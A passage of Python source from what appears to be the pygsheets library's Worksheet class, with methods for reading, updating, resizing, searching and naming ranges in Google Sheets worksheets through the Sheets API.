'gridProperties/rowCount')
@property
def cols(self):
"""Number of columns active within the sheet."""
return int(self.jsonSheet['properties']['gridProperties']['columnCount'])
@cols.setter
def cols(self, col_count):
if col_count == self.cols:
return
self.jsonSheet['properties']['gridProperties']['columnCount'] = int(col_count)
if self._linked:
self.client.sheet.update_sheet_properties_request(self.spreadsheet.id, self.jsonSheet['properties'],
'gridProperties/columnCount')
@property
def frozen_rows(self):
"""Number of frozen rows."""
return self.jsonSheet['properties']['gridProperties'].get('frozenRowCount', 0)
@frozen_rows.setter
def frozen_rows(self, row_count):
self.jsonSheet['properties']['gridProperties']['frozenRowCount'] = int(row_count)
if self._linked:
self.client.sheet.update_sheet_properties_request(self.spreadsheet.id, self.jsonSheet['properties'],
'gridProperties/frozenRowCount')
@property
def frozen_cols(self):
"""Number of frozen columns."""
return self.jsonSheet['properties']['gridProperties'].get('frozenColumnCount', 0)
@frozen_cols.setter
def frozen_cols(self, col_count):
self.jsonSheet['properties']['gridProperties']['frozenColumnCount'] = int(col_count)
if self._linked:
self.client.sheet.update_sheet_properties_request(self.spreadsheet.id, self.jsonSheet['properties'],
'gridProperties/frozenColumnCount')
@property
def linked(self):
"""If the sheet is linked."""
return self._linked
def refresh(self, update_grid=False):
"""refresh worksheet data"""
jsonsheet = self.client.open_as_json(self.spreadsheet.id)
for sheet in jsonsheet.get('sheets'):
if sheet['properties']['sheetId'] == self.id:
self.jsonSheet = sheet
if update_grid:
self._update_grid()
# @TODO the update is not instantaneous
def _update_grid(self, force=False):
"""
update the data grid (offline) with values from the sheet
:param force: force update data grid
"""
if not self.data_grid or force:
self.data_grid = self.get_all_values(returnas='cells', include_tailing_empty=True, include_tailing_empty_rows=True)
elif not force:
updated = datetime.datetime.strptime(self.spreadsheet.updated, '%Y-%m-%dT%H:%M:%S.%fZ')
if updated > self.grid_update_time:
self.data_grid = self.get_all_values(returnas='cells', include_tailing_empty=True, include_tailing_empty_rows=True)
self.grid_update_time = datetime.datetime.utcnow()
def link(self, syncToCloud=True):
""" Link the spreadsheet with cloud, so all local changes
will be updated instantly, so does all data fetches
:param syncToCloud: update the cloud with local changes (data_grid) if set to true
update the local copy with cloud if set to false
"""
self._linked = True
if syncToCloud:
self.client.sheet.update_sheet_properties_request(self.spreadsheet.id, self.jsonSheet['properties'], '*')
else:
wks = self.spreadsheet.worksheet(property='id', value=self.id)
self.jsonSheet = wks.jsonSheet
tmp_data_grid = [item for sublist in self.data_grid for item in sublist] # flatten the list
self.update_cells(tmp_data_grid)
# @TODO
def unlink(self):
""" Unlink the spread sheet with cloud, so all local changes
will be made on local copy fetched
.. warning::
After unlinking update functions will work
"""
self._update_grid()
self._linked = False
def sync(self):
"""
sync the worksheet (datagrid, and worksheet properties) to cloud
"""
self.link(True)
self.logger.warn("sync not implimented")
def _get_range(self, start_label, end_label=None, rformat='A1'):
"""get range in A1 notation, given start and end labels
:param start_label: range start label
:param end_label: range end label
:param rformat: can be A1 or GridRange
"""
if not end_label:
end_label = start_label
if rformat == "A1":
return self.title + '!' + ('%s:%s' % (format_addr(start_label, 'label'),
format_addr(end_label, 'label')))
else:
start_tuple = format_addr(start_label, "tuple")
end_tuple = format_addr(end_label, "tuple")
return {"sheetId": self.id, "startRowIndex": start_tuple[0]-1, "endRowIndex": end_tuple[0],
"startColumnIndex": start_tuple[1]-1, "endColumnIndex": end_tuple[1]}
def cell(self, addr):
"""
Returns cell object at given address.
:param addr: cell address as either tuple (row, col) or cell label 'A1'
:returns: an instance of a :class:`Cell`
Example:
>>> wks.cell((1,1))
<Cell R1C1 "I'm cell A1">
>>> wks.cell('A1')
<Cell R1C1 "I'm cell A1">
"""
if not self._linked: return False
try:
if type(addr) is str:
val = self.client.get_range(self.spreadsheet.id, self._get_range(addr, addr), 'ROWS')[0][0]
elif type(addr) is tuple:
label = format_addr(addr, 'label')
val = self.client.get_range(self.spreadsheet.id, self._get_range(label, label), 'ROWS')[0][0]
else:
raise CellNotFound
except Exception as e:
if str(e).find('exceeds grid limits') != -1:
raise CellNotFound
else:
raise
return Cell(addr, val, self)
def range(self, crange, returnas='cells'):
"""Returns a list of :class:`Cell` objects from specified range.
:param crange: A string with range value in common format,
e.g. 'A1:A5'.
:param returnas: can be 'matrix', 'cell', 'range' the corresponding type will be returned
"""
startcell = crange.split(':')[0]
endcell = crange.split(':')[1]
return self.get_values(startcell, endcell, returnas=returnas, include_tailing_empty_rows=True)
def get_value(self, addr, value_render=ValueRenderOption.FORMATTED_VALUE):
"""
value of a cell at given address
:param addr: cell address as either tuple or label
:param value_render: how the output values should rendered. `api docs <https://developers.google.com/sheets/api/reference/rest/v4/ValueRenderOption>`__
"""
addr = format_addr(addr, 'tuple')
try:
return self.get_values(addr, addr, returnas='matrix', include_tailing_empty=True,
include_tailing_empty_rows=True, value_render=value_render)[0][0]
except KeyError:
raise CellNotFound
def get_values(self, start, end, returnas='matrix', majdim='ROWS', include_tailing_empty=True,
include_tailing_empty_rows=False, value_render=ValueRenderOption.FORMATTED_VALUE,
date_time_render_option=DateTimeRenderOption.SERIAL_NUMBER, **kwargs):
"""
Returns a range of values from start cell to end cell. It will fetch these values from remote and then
process them. Will return either a simple list of lists, a list of Cell objects or a DataRange object with
all the cells inside.
:param start: Top left position as tuple or label
:param end: Bottom right position as tuple or label
:param majdim: The major dimension of the matrix ('ROWS' or 'COLUMNS')
:param returnas: The type to return the fetched values as. ('matrix', 'cell', 'range')
:param include_tailing_empty: whether to include empty trailing cells/values after last non-zero value in a row
:param include_tailing_empty_rows: whether to include tailing rows with no values; if include_tailing_empty is false,
will return unfilled list for each empty row, else will return rows filled with empty cells
:param value_render: how the output values should rendered. `api docs <https://developers.google.com/sheets/api/reference/rest/v4/ValueRenderOption>`__
:param date_time_render_option: How dates, times, and durations should be represented in the output.
This is ignored if `valueRenderOption` is `FORMATTED_VALUE`. The default
dateTime render option is [`DateTimeRenderOption.SERIAL_NUMBER`].
:returns: 'range': :class:`DataRange <DataRange>`
'cell': [:class:`Cell <Cell>`]
'matrix': [[ ... ], [ ... ], ...]
"""
include_tailing_empty = kwargs.get('include_empty', include_tailing_empty)
include_tailing_empty_rows = kwargs.get('include_all', include_tailing_empty_rows)
_deprecated_keywords = ['include_empty', 'include_all']
for key in list(kwargs):
if key in _deprecated_keywords:
warnings.warn(
'The argument {} is deprecated. Use {} instead.'.format(key, _deprecated_keyword_mapping[key])
, category=DeprecationWarning)
kwargs.pop(key, None)
if not self._linked: return False
majdim = majdim.upper()
if majdim.startswith('COL'):
majdim = "COLUMNS"
prev_include_tailing_empty_rows, prev_include_tailing_empty = True, True
# fetch the values
if returnas == 'matrix':
values = self.client.get_range(self.spreadsheet.id, self._get_range(start, end), majdim,
value_render_option=value_render,
date_time_render_option=date_time_render_option, **kwargs)
empty_value = ''
else:
values = self.client.sheet.get(self.spreadsheet.id, fields='sheets/data/rowData',
includeGridData=True,
ranges=self._get_range(start, end))
values = values['sheets'][0]['data'][0].get('rowData', [])
values = [x.get('values', []) for x in values]
empty_value = dict({"effectiveValue": {"stringValue": ""}})
# Cells are always returned in row-major form from the API; keep them that way for now.
# So first make a complete rectangle and clean up later
if majdim == "COLUMNS":
prev_include_tailing_empty = include_tailing_empty
prev_include_tailing_empty_rows = include_tailing_empty_rows
include_tailing_empty = True
include_tailing_empty_rows = True
if returnas == 'range': # need perfect rectangle
include_tailing_empty = True
include_tailing_empty_rows = True
if values == [['']] or values == []: values = [[]]
# cleanup and re-structure the values
start = format_addr(start, 'tuple')
end = format_addr(end, 'tuple')
max_rows = end[0] - start[0] + 1
max_cols = end[1] - start[1] + 1
if majdim == "COLUMNS" and returnas == "matrix":
max_cols = end[0] - start[0] + 1
max_rows = end[1] - start[1] + 1
# restructure values according to params
if include_tailing_empty_rows and (max_rows-len(values)) > 0: # append empty rows in end
values.extend([[]]*(max_rows-len(values)))
if include_tailing_empty: # append tailing cells in rows
values = [list(x + [empty_value] * (max_cols - len(x))) for x in values]
elif returnas != 'matrix':
for i, row in enumerate(values):
for j, cell in reversed(list(enumerate(row))):
if 'effectiveValue' not in cell:
del values[i][j]
else:
break
if values == [[]] or values == [['']]: return values
if returnas == 'matrix':
return values
else:
# Now the cells form a complete rectangle; convert to column-major form and remove
# the excess cells based on the params saved
if majdim == "COLUMNS":
values = list(map(list, zip(*values)))
for i in range(len(values) - 1, -1, -1):
if not prev_include_tailing_empty_rows:
if not any((item.get("effectiveValue", {}).get("stringValue", "-1") != "" and "effectiveValue" in item) for item in values[i]):
del values[i]
continue
if not prev_include_tailing_empty:
for k in range(len(values[i])-1, -1, -1):
if values[i][k].get("effectiveValue", {}).get("stringValue", "-1") != "" and "effectiveValue" in values[i][k]:
break
else:
del values[i][k]
max_cols = end[0] - start[0] + 1
max_rows = end[1] - start[1] + 1
cells = []
for k in range(len(values)):
cells.extend([[]])
for i in range(len(values[k])):
if majdim == "ROWS":
cells[-1].append(Cell(pos=(start[0]+k, start[1]+i), worksheet=self, cell_data=values[k][i]))
else:
cells[-1].append(Cell(pos=(start[0]+i, start[1]+k), worksheet=self, cell_data=values[k][i]))
if cells == []: cells = [[]]
if returnas.startswith('cell'):
return cells
elif returnas == 'range':
return DataRange(start, format_addr(end, 'label'), worksheet=self, data=cells)
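# Illustrative usage sketch (not part of the library; the worksheet object `wks` and the
# addresses are hypothetical). The same range can be fetched in the three supported forms:
#   >>> wks.get_values('A1', 'C3', returnas='matrix')   # list of lists of plain values
#   >>> wks.get_values((1, 1), (3, 3), returnas='cell') # list of lists of Cell objects
#   >>> wks.get_values('A1', 'C3', returnas='range')    # a single DataRange wrapping the cells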
def get_all_values(self, returnas='matrix', majdim='ROWS', include_tailing_empty=True,
include_tailing_empty_rows=True, **kwargs):
"""Returns a list of lists containing all cells' values as strings.
:param majdim: output as row-wise or column-wise
:param returnas: return as a list of strings or of cell objects
:param include_tailing_empty: whether to include empty trailing cells/values after last non-zero value
:param include_tailing_empty_rows: whether to include rows with no values; if include_tailing_empty is false,
will return unfilled list for each empty row, else will return rows filled with empty string
:param kwargs: all parameters of :meth:`pygsheets.Worksheet.get_values`
:type returnas: 'matrix', 'cell', 'range'
Example:
>>> wks.get_all_values()
[[u'another look.', u'', u'est'],
[u'EE 4212', u"it's down there "],
[u'ee 4210', u'somewhere, let me take ']]
"""
return self.get_values((1, 1), (self.rows, self.cols), returnas=returnas, majdim=majdim,
include_tailing_empty=include_tailing_empty,
include_tailing_empty_rows=include_tailing_empty_rows, **kwargs)
def get_all_records(self, empty_value='', head=1, majdim='ROWS', numericise_data=True, **kwargs):
"""
Returns a list of dictionaries, all of them having
- the contents of the spreadsheet with the head row as keys, \
And each of these dictionaries holding
- the contents of subsequent rows of cells as values.
Cell values are numericised (strings that can be read as ints
or floats are converted).
:param empty_value: determines empty cell's value
:param head: determines which row to use as keys, starting from 1
following the numbering of the spreadsheet.
:param majdim: ROW or COLUMN major form
:param numericise_data: determines if data is converted to numbers or left as string
:param kwargs: all parameters of :meth:`pygsheets.Worksheet.get_values`
:returns: a list of dict with header column values as head and rows as list
.. warning::
Will work nicely only if there is a single table in the sheet
"""
if not self._linked: return False
idx = head - 1
data = self.get_all_values(returnas='matrix', include_tailing_empty=False, include_tailing_empty_rows=False,
majdim=majdim, **kwargs)
keys = data[idx]
num_keys = len(keys)
values = []
for row in data[idx+1:]:
if len(row) < num_keys:
row.extend([""]*(num_keys-len(row)))
elif len(row) > num_keys:
row = row[:num_keys]
if numericise_data:
values.append(numericise_all(row, empty_value))
else:
values.append(row)
return [dict(zip(keys, row)) for row in values]
def get_row(self, row, returnas='matrix', include_tailing_empty=True, **kwargs):
"""Returns a list of all values in a `row`.
Empty cells in this list will be rendered as empty strings.
:param include_tailing_empty: whether to include empty trailing cells/values after last non-zero value
:param row: index of row
:param kwargs: all parameters of :meth:`pygsheets.Worksheet.get_values`
:param returnas: ('matrix', 'cell', 'range') return as cell objects or just 2d array or range object
"""
return self.get_values((row, 1), (row, self.cols), returnas=returnas,
include_tailing_empty=include_tailing_empty, include_tailing_empty_rows=True, **kwargs)[0]
def get_col(self, col, returnas='matrix', include_tailing_empty=True, **kwargs):
"""Returns a list of all values in column `col`.
Empty cells in this list will be rendered as empty strings.
:param include_tailing_empty: whether to include empty trailing cells/values after last non-zero value
:param col: index of col
:param kwargs: all parameters of :meth:`pygsheets.Worksheet.get_values`
:param returnas: ('matrix' or 'cell' or 'range') return as cell objects or just values
"""
return self.get_values((1, col), (self.rows, col), returnas=returnas, majdim='COLUMNS',
include_tailing_empty=include_tailing_empty, include_tailing_empty_rows=True, **kwargs)[0]
def get_gridrange(self, start, end):
"""
get a range in gridrange format
:param start: start address
:param end: end address
"""
return self._get_range(start, end, "gridrange")
def update_cell(self, **kwargs):
warnings.warn(_warning_mesage.format("method", "update_value"), category=DeprecationWarning)
self.update_value(**kwargs)
def update_value(self, addr, val, parse=None):
"""Sets the new value to a cell.
:param addr: cell address as tuple (row,column) or label 'A1'.
:param val: New value
:param parse: if False, values will be stored \
as-is; otherwise they are parsed as if the user typed them into the UI. Default is spreadsheet.default_parse
Example:
>>> wks.update_value('A1', '42') # this could be 'a1' as well
<Cell R1C1 "42">
>>> wks.update_value('A3', '=A1+A2', True)
<Cell R3C1 "57">
"""
if not self._linked: return False
label = format_addr(addr, 'label')
body = dict()
body['range'] = self._get_range(label, label)
body['majorDimension'] = 'ROWS'
body['values'] = [[val]]
parse = parse if parse is not None else self.spreadsheet.default_parse
self.client.sheet.values_batch_update(self.spreadsheet.id, body, parse)
def update_values(self, crange=None, values=None, cell_list=None, extend=False, majordim='ROWS', parse=None):
"""Updates cell values in batch, it can take either a cell list or a range and values. cell list is only efficient
for small lists. This will only update the cell values not other properties.
:param cell_list: List of :class:`Cell` objects to update with their values. If you pass a matrix to this,\
then it is assumed that the matrix is continuous (range), and will just update values based on label of top \
left and bottom right cells.
:param crange: range in format A1:A2 or just 'A1' or even (1,2) end cell will be inferred from values
:param values: matrix of values if range given, if a value is None its unchanged
:param extend: add columns and rows to the workspace if needed (not for cell list)
:param majordim: major dimension of given data
:param parse: if True, values are parsed as if the user typed them into the UI; otherwise they are stored as-is. Default is
spreadsheet.default_parse
"""
if not self._linked: return False
if cell_list:
if type(cell_list[0]) is list:
values = []
for row in cell_list:
tmp_row = []
for col in row:
tmp_row.append(col.value)
values.append(tmp_row)
crange = cell_list[0][0].label + ':' + cell_list[-1][-1].label
else:
values = [[None for x in range(self.cols)] for y in range(self.rows)]
min_tuple = [cell_list[0].row, cell_list[0].col]
max_tuple = [0, 0]
for cell in cell_list:
min_tuple[0] = min(min_tuple[0], cell.row)
min_tuple[1] = min(min_tuple[1], cell.col)
max_tuple[0] = max(max_tuple[0], cell.row)
max_tuple[1] = max(max_tuple[1], cell.col)
try:
values[cell.row-1][cell.col-1] = cell.value
except IndexError:
raise CellNotFound(cell)
values = [row[min_tuple[1]-1:max_tuple[1]] for row in values[min_tuple[0]-1:max_tuple[0]]]
crange = str(format_addr(tuple(min_tuple))) + ':' + str(format_addr(tuple(max_tuple)))
elif crange and values:
if not isinstance(values, list) or not isinstance(values[0], list):
raise InvalidArgumentValue("values should be a matrix")
else:
raise InvalidArgumentValue("provide either cells or values, not both")
body = dict()
estimate_size = False
if type(crange) == str:
if crange.find(':') == -1:
estimate_size = True
elif type(crange) == tuple:
estimate_size = True
else:
raise InvalidArgumentValue('crange')
if estimate_size:
start_r_tuple = format_addr(crange, output='tuple')
max_2nd_dim = max(map(len, values))
if majordim == 'ROWS':
end_r_tuple = (start_r_tuple[0]+len(values), start_r_tuple[1]+max_2nd_dim)
else:
end_r_tuple = (start_r_tuple[0] + max_2nd_dim, start_r_tuple[1] + len(values))
body['range'] = self._get_range(crange, format_addr(end_r_tuple))
else:
body['range'] = self._get_range(*crange.split(':'))
if extend:
self.refresh()
end_r_tuple = format_addr(str(body['range']).split(':')[-1])
if self.rows < end_r_tuple[0]:
self.rows = end_r_tuple[0]-1
if self.cols < end_r_tuple[1]:
self.cols = end_r_tuple[1]-1
body['majorDimension'] = majordim
body['values'] = values
parse = parse if parse is not None else self.spreadsheet.default_parse
self.client.sheet.values_batch_update(self.spreadsheet.id, body, parse)
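# Illustrative usage sketch (hypothetical worksheet `wks` and data): write a 2x2 block whose
# top-left corner is B2; the bottom-right corner is inferred from the shape of `values`.
#   >>> wks.update_values(crange='B2', values=[[1, 2], [3, 4]])
#   >>> wks.update_values(cell_list=flat_list_of_cells)  # alternatively, update Cell objects directly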
def update_cells_prop(self, **kwargs):
warnings.warn(_warning_mesage.format('method', 'update_cells'), category=DeprecationWarning)
self.update_cells(**kwargs)
def update_cells(self, cell_list, fields='*'):
"""
update cell properties and data from a list of cell objects
:param cell_list: list of cell objects
:param fields: cell fields to update, in google `FieldMask format <https://developers.google.com/protocol-buffers/docs/reference/google.protobuf#google.protobuf.FieldMask>`_
"""
if not self._linked: return False
if fields == 'userEnteredValue':
pass # TODO Create a grid and put values there and update
requests = []
for cell in cell_list:
request = cell.update(get_request=True, worksheet_id=self.id)
request['repeatCell']['fields'] = fields
requests.append(request)
self.client.sheet.batch_update(self.spreadsheet.id, requests)
def update_col(self, index, values, row_offset=0):
"""
update an existing colum with values
:param index: index of the starting column form where value should be inserted
:param values: values to be inserted as matrix, column major
:param row_offset: rows to skip before inserting values
"""
if not self._linked: return False
if type(values[0]) is not list:
values = [values]
colrange = format_addr((row_offset+1, index), 'label') + ":" + format_addr((row_offset+len(values[0]),
index+len(values)-1), "label")
self.update_values(crange=colrange, values=values, majordim='COLUMNS')
def update_row(self, index, values, col_offset=0):
"""Update an existing row with values
:param index: Index of the starting row from where values should be inserted
:param values: Values to be inserted as matrix
:param col_offset: Columns to skip before inserting values
"""
if not self._linked: return False
if type(values[0]) is not list:
values = [values]
colrange = format_addr((index, col_offset+1), 'label') + ':' + format_addr((index+len(values)-1,
col_offset+len(values[0])), 'label')
self.update_values(crange=colrange, values=values, majordim='ROWS')
def resize(self, rows=None, cols=None):
"""Resizes the worksheet.
:param rows: New number of rows.
:param cols: New number of columns.
"""
trows, tcols = self.rows, self.cols
try:
self.rows, self.cols = rows, cols
except Exception:
self.logger.error("couldn't resize the sheet to " + str(rows) + ',' + str(cols))
self.rows, self.cols = trows, tcols
def add_rows(self, rows):
"""Adds new rows to this worksheet.
:param rows: How many rows to add (integer)
"""
self.resize(rows=self.rows + rows, cols=self.cols)
def add_cols(self, cols):
"""Add new columns to this worksheet.
:param cols: How many columns to add (integer)
"""
self.resize(cols=self.cols + cols, rows=self.rows)
def delete_cols(self, index, number=1):
"""Delete 'number' of columns from index.
:param index: Index of first column to delete
:param number: Number of columns to delete
"""
if not self._linked: return False
index -= 1
if number < 1:
raise InvalidArgumentValue('number')
request = {'deleteDimension': {'range': {'sheetId': self.id, 'dimension': 'COLUMNS',
'endIndex': (index+number), 'startIndex': index}}}
self.client.sheet.batch_update(self.spreadsheet.id, request)
self.jsonSheet['properties']['gridProperties']['columnCount'] = self.cols-number
def delete_rows(self, index, number=1):
"""Delete 'number' of rows from index.
:param index: Index of first row to delete
:param number: Number of rows to delete
"""
if not self._linked: return False
index -= 1
if number < 1:
raise InvalidArgumentValue
request = {'deleteDimension': {'range': {'sheetId': self.id, 'dimension': 'ROWS',
'endIndex': (index+number), 'startIndex': index}}}
self.client.sheet.batch_update(self.spreadsheet.id, request)
self.jsonSheet['properties']['gridProperties']['rowCount'] = self.rows-number
def insert_cols(self, col, number=1, values=None, inherit=False):
"""Insert new columns after 'col' and initialize all cells with values. Increases the
number of rows if there are more values in values than rows.
Reference: `insert request <https://developers.google.com/sheets/api/reference/rest/v4/spreadsheets/request#insertdimensionrequest>`_
:param col: Index of the col at which the values will be inserted.
:param number: Number of columns to be inserted.
:param values: Content to be inserted into new columns.
:param inherit: New cells will inherit properties from the column to the left (True) or to the right (False).
"""
if not self._linked: return False
request = {'insertDimension': {'inheritFromBefore': inherit,
'range': {'sheetId': self.id, 'dimension': 'COLUMNS',
'endIndex': (col+number), 'startIndex': col}
}}
self.client.sheet.batch_update(self.spreadsheet.id, request)
self.jsonSheet['properties']['gridProperties']['columnCount'] = self.cols+number
if values:
self.update_col(col+1, values)
def insert_rows(self, row, number=1, values=None, inherit=False):
"""Insert a new row after 'row' and initialize all cells with values.
Widens the worksheet if there are more values than columns.
Reference: `insert request`_
:param row: Index of the row at which the values will be inserted.
:param number: Number of rows to be inserted.
:param values: Content to be inserted into new rows.
:param inherit: New cells will inherit properties from the row above (True) or below (False).
"""
if not self._linked: return False
request = {'insertDimension': {'inheritFromBefore': inherit,
'range': {'sheetId': self.id, 'dimension': 'ROWS',
'endIndex': (row+number), 'startIndex': row}}}
self.client.sheet.batch_update(self.spreadsheet.id, request)
self.jsonSheet['properties']['gridProperties']['rowCount'] = self.rows + number
if values:
self.update_row(row+1, values)
def clear(self, start='A1', end=None, fields="userEnteredValue"):
"""Clear all values in worksheet. Can be limited to a specific range with start & end.
Fields specifies which cell properties should be cleared. Use "*" to clear all fields.
Reference:
- `CellData Api object <https://developers.google.com/sheets/api/reference/rest/v4/spreadsheets#CellData>`_
- `FieldMask Api object <https://developers.google.com/protocol-buffers/docs/reference/google.protobuf#google.protobuf.FieldMask>`_
:param start: Top left cell label.
:param end: Bottom right cell label.
:param fields: Comma separated list of field masks.
"""
if not self._linked: return False
if not end:
end = (self.rows, self.cols)
request = {"updateCells": {"range": self._get_range(start, end, "GridRange"), "fields": fields}}
self.client.sheet.batch_update(self.spreadsheet.id, request)
def adjust_column_width(self, start, end=None, pixel_size=100):
"""Set the width of one or more columns.
:param start: Index of the first column to be widened.
:param end: Index of the last column to be widened.
:param pixel_size: New width in pixels.
"""
if not self._linked: return False
if end is None or end <= start:
end = start + 1
request = {
"updateDimensionProperties": {
"range": {
"sheetId": self.id,
"dimension": "COLUMNS",
"startIndex": start,
"endIndex": end
},
"properties": {
"pixelSize": pixel_size
},
"fields": "pixelSize"
}
},
self.client.sheet.batch_update(self.spreadsheet.id, request)
def update_dimensions_visibility(self, start, end=None, dimension="ROWS", hidden=True):
"""Hide or show one or more rows or columns.
:param start: Index of the first row or column.
:param end: Index of the last row or column.
:param dimension: 'ROWS' or 'COLUMNS'
:param hidden: Hide rows or columns
"""
if not self._linked: return False
if end is None or end <= start:
end = start + 1
request = {
"updateDimensionProperties": {
"range": {
"sheetId": self.id,
"dimension": dimension,
"startIndex": start,
"endIndex": end
},
"properties": {
"hiddenByUser": hidden
},
"fields": "hiddenByUser"
}
},
self.client.sheet.batch_update(self.spreadsheet.id, request)
def hide_dimensions(self, start, end=None, dimension="ROWS"):
"""Hide one ore more rows or columns.
:param start: Index of the first row or column.
:param end: Index of the first row or column.
:param dimension: 'ROWS' or 'COLUMNS'
"""
self.update_dimensions_visibility(start, end, dimension, hidden=True)
def show_dimensions(self, start, end=None, dimension="ROWS"):
"""Show one ore more rows or columns.
:param start: Index of the first row or column.
:param end: Index of the first row or column.
:param dimension: 'ROWS' or 'COLUMNS'
"""
self.update_dimensions_visibility(start, end, dimension, hidden=False)
def adjust_row_height(self, start, end=None, pixel_size=100):
"""Adjust the height of one or more rows.
:param start: Index of first row to be heightened.
:param end: Index of last row to be heightened.
:param pixel_size: New height in pixels.
"""
if not self._linked: return False
if end is None or end <= start:
end = start + 1
request = {
"updateDimensionProperties": {
"range": {
"sheetId": self.id,
"dimension": "ROWS",
"startIndex": start,
"endIndex": end
},
"properties": {
"pixelSize": pixel_size
},
"fields": "pixelSize"
}
}
self.client.sheet.batch_update(self.spreadsheet.id, request)
def append_table(self, values, start='A1', end=None, dimension='ROWS', overwrite=False, **kwargs):
"""Append a row or column of values.
This will append the list of provided values after the last row of data found within the given range.
Reference: `request <https://developers.google.com/sheets/api/reference/rest/v4/spreadsheets.values/append>`_
:param values: List of values for the new row or column.
:param start: Top left cell of the range (requires a label).
:param end: Bottom right cell of the range (requires a label).
:param dimension: Dimension to which the values will be added ('ROWS' or 'COLUMNS')
:param overwrite: If true will overwrite data present in the spreadsheet. Otherwise will create new
rows to insert the data into.
"""
if not self._linked:
return False
if type(values[0]) != list:
values = [values]
if not end:
end = (self.rows, self.cols)
self.client.sheet.values_append(self.spreadsheet.id, values, dimension, range=self._get_range(start, end),
insertDataOption='OVERWRITE' if overwrite else 'INSERT_ROWS', **kwargs)
self.refresh(False)
def replace(self, pattern, replacement=None, **kwargs):
"""Replace values in any cells matched by pattern in this worksheet. Keyword arguments
not specified will use the default value.
If the worksheet is
- **Unlinked** : Uses `self.find(pattern, **kwargs)` to find the cells and then replace the values in each cell.
- **Linked** : The replacement will be done by a findReplaceRequest as defined by the Google Sheets API.\
After the request the local copy is updated.
Reference: `request <https://developers.google.com/sheets/api/reference/rest/v4/spreadsheets/request#findreplacerequest>`__
:param pattern: Match cell values.
:param replacement: Value used as replacement.
:arg searchByRegex: Consider pattern a regex pattern. (default False)
:arg matchCase: Match case sensitive. (default False)
:arg matchEntireCell: Only match on full match. (default False)
:arg includeFormulas: Match fields with formulas too. (default False)
"""
if self._linked:
find_replace = dict()
find_replace['find'] = pattern
find_replace['replacement'] = replacement
for key in kwargs:
find_replace[key] = kwargs[key]
find_replace['sheetId'] = self.id
body = {'findReplace': find_replace}
self.client.sheet.batch_update(self.spreadsheet.id, body)
# self._update_grid(True)
else:
found_cells = self.find(pattern, **kwargs)
if replacement is None:
replacement = ''
for cell in found_cells:
if 'matchEntireCell' in kwargs and kwargs['matchEntireCell']:
cell.value = replacement
else:
cell.value = re.sub(pattern, replacement, cell.value)
def find(self, pattern, searchByRegex=False, matchCase=False, matchEntireCell=False, includeFormulas=False):
"""Finds all cells matched by the pattern.
Compare each cell within this sheet with pattern and return all matched cells. All cells are compared
as strings. If replacement is set, the value in each cell is set to this value, unless full_match is False,
in which case only the matched part is replaced.
.. note::
- Formulas are searched as their calculated values and not the actual formula.
- Find fetches all data and then runs a linear search on them, so this will be slow if you have a large sheet
:param pattern: A string pattern.
:param searchByRegex: Compile pattern as regex. (default False)
:param matchCase: Comparison is case sensitive. (default False)
:param matchEntireCell: Only match a cell if the pattern matches the entire value. (default False)
:param includeFormulas: Match cells with formulas. (default False)
:returns: A list of :class:`Cells <Cell>`.
"""
if self._linked:
self._update_grid(True)
# flatten data grid.
found_cells = [item for sublist in self.data_grid for item in sublist]
if not includeFormulas:
found_cells = filter(lambda x: x.formula == '', found_cells)
if not matchCase:
pattern = pattern.lower()
if searchByRegex and matchEntireCell and matchCase:
return list(filter(lambda x: fullmatch(pattern, x.value), found_cells))
elif searchByRegex and matchEntireCell and not matchCase:
return list(filter(lambda x: fullmatch(pattern.lower(), x.value.lower()), found_cells))
elif searchByRegex and not matchEntireCell and matchCase:
return list(filter(lambda x: re.search(pattern, x.value), found_cells))
elif searchByRegex and not matchEntireCell and not matchCase:
return list(filter(lambda x: re.search(pattern, x.value.lower()), found_cells))
elif not searchByRegex and matchEntireCell and matchCase:
return list(filter(lambda x: x.value == pattern, found_cells))
elif not searchByRegex and matchEntireCell and not matchCase:
return list(filter(lambda x: x.value.lower() == pattern, found_cells))
elif not searchByRegex and not matchEntireCell and matchCase:
return list(filter(lambda x: False if x.value.find(pattern) == -1 else True, found_cells))
else: # if not searchByRegex and not matchEntireCell and not matchCase
return list(filter(lambda x: False if x.value.lower().find(pattern) == -1 else True, found_cells))
# @TODO optimize with unlink
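# Illustrative usage sketch (hypothetical worksheet `wks` and patterns): find cells by regex,
# then replace a literal value across the whole sheet.
#   >>> hits = wks.find('tot.l', searchByRegex=True)             # list of matching Cell objects
#   >>> wks.replace('N/A', replacement='', matchEntireCell=True)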
def create_named_range(self, name, start, end, returnas='range'):
"""Create a new named range in this worksheet.
Reference: `Named range Api object <https://developers.google.com/sheets/api/reference/rest/v4/spreadsheets#namedrange>`_
:param name: Name of the range.
:param start: Top left cell address (label or coordinates)
:param end: Bottom right cell address (label or coordinates)
:returns: :class:`DataRange`
"""
if not self._linked: return False
start = format_addr(start, 'tuple')
end = format_addr(end, 'tuple')
request = {"addNamedRange": {
"namedRange": {
"name": name,
"range": {
"sheetId": self.id,
"startRowIndex": start[0]-1,
"endRowIndex": end[0],
"startColumnIndex": start[1]-1,
"endColumnIndex": end[1],
}
}}}
res = self.client.sheet.batch_update(self.spreadsheet.id, request)['replies'][0]['addNamedRange']['namedRange']
if returnas == 'json':
return res
else:
return DataRange(worksheet=self, namedjson=res)
def get_named_range(self, name):
"""Get a named range by name.
Reference: `Named range Api object`_
:param name: Name of the named range to be retrieved.
:returns: :class:`DataRange`
:raises RangeNotFound: if no range matched the name given.
"""
if not self._linked: return False
nrange = [x for x in self.spreadsheet.named_ranges if x.name == name and x.worksheet.id == self.id]
if len(nrange) == 0:
self.spreadsheet.update_properties()
nrange = [x for x in self.spreadsheet.named_ranges if x.name == name and x.worksheet.id == self.id]
if len(nrange) == 0:
raise RangeNotFound(name)
return nrange[0]
def get_named_ranges(self, name=''):
"""Get named ranges from this worksheet.
Reference: `Named range Api object`_
:param name: Name of the named range to be retrieved, if omitted all ranges are retrieved.
:return: :class:`DataRange`
"""
if not self._linked: return False
if name == '':
self.spreadsheet.update_properties()
nrange = [x for x in self.spreadsheet.named_ranges if x.worksheet.id == self.id]
return nrange
else:
return self.get_named_range(name)
def delete_named_range(self, name, range_id=''):
"""Delete a named range.
Reference: `Named range Api object`_
:param name: Name of the range.
:param range_id: Id of the range (optional)
"""
if not self._linked: return False
if not range_id:
range_id = self.get_named_ranges(name=name).name_id
request = {'deleteNamedRange': {
"namedRangeId": range_id,
}}
self.client.sheet.batch_update(self.spreadsheet.id, request)
self.spreadsheet._named_ranges = [x for x in self.spreadsheet._named_ranges if x["namedRangeId"] != range_id]
def create_protected_range(self, start, end, returnas='range'):
"""Create protected range.
